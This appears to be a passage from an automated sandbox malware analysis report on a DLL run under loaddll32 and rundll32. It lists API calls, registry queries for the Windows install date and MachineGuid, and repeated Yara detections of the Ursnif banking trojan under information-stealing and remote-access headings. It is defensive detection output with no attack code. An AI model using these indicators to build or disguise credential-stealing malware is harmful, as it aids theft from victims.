Source: C:\Windows\System32\loaddll32.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,		1_2_6D67C4D0
Source: C:\Windows\System32\loaddll32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,		1_2_6D67BE2F
Source: C:\Windows\System32\loaddll32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,		1_2_6D67C9EE
Source: C:\Windows\System32\loaddll32.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,		1_2_6D6781A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,		4_2_6D641566
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,		4_2_6D67BDC3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,		4_2_6D67C4D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,		4_2_6D67BE2F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,		4_2_6D67C9EE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,		4_2_6D6781A7

Queries the installation date of Windows

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Contains functionality to query local / system time

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6D6417A7 SetThreadPriority,GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,

1_2_6D6417A7

Contains functionality to query windows version

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6D64146C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

1_2_6D64146C

Queries the cryptographic machine GUID

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Ursnif

Source: Yara match	File source: 00000003.00000003.353723061.0000000004820000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.352567979.0000000002EE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.363425153.00000000014C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.362002402.0000000003460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.3.rundll32.exe.3468d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.4828d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.6d640000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.loaddll32.exe.14c8d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.6d640000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.2ee8d29.0.raw.unpack, type: UNPACKEDPE

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.496778045.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496874828.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496855209.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496831807.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496666566.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496741796.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496893630.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496622014.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 1004, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Source: Yara match	File source: 00000003.00000003.353723061.0000000004820000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.352567979.0000000002EE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.363425153.00000000014C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.362002402.0000000003460000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.3.rundll32.exe.3468d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.4828d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.6d640000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.loaddll32.exe.14c8d29.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.6d640000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.2ee8d29.0.raw.unpack, type: UNPACKEDPE

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.496778045.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496874828.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496855209.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496831807.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496666566.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496741796.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496893630.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.496622014.0000000005918000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 1004, type: MEMORY